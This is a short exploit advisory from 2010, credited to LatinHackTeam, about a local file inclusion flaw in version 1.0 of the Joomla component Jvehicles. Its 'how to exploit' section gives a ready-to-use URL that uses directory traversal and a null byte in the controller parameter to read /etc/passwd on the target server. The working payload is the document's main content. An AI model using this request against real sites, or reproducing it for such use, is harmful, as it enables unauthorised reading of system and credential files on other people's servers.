Joomla Component Jvehicles Local File Inclusion :

Date : 2010-04-01 Author : Chip D3 Bi0s
---------------------------------------------------------------------------------
Joomla Component Jvehicles Local File Inclusion
---------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Group		: LatinHackTeam
Email & msn	: [email protected]
Date		: 31 March 2010
Critical Lvl	: Moderate
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application	: Jvehicles
version		: 1.0
Developer	: este8an
License		: GPL            type  : Non-Commercial
Date Added	: 5 May 2009
Download	: http://www.jvehicles.com/index.php?option=com_remository&Itemid=6&func=select&id=2&orderby=3〈=en




Description     :

Derivation of a popular component com_properties (for Estate Agent) .
This component is to manage vehicles. With the same functionality.


--------------
file error	: components/com_jvehicles/jvehicles.php

how to exploit

http://127.0.0.1/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00

------------------------


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

C1

 

C2

 

C3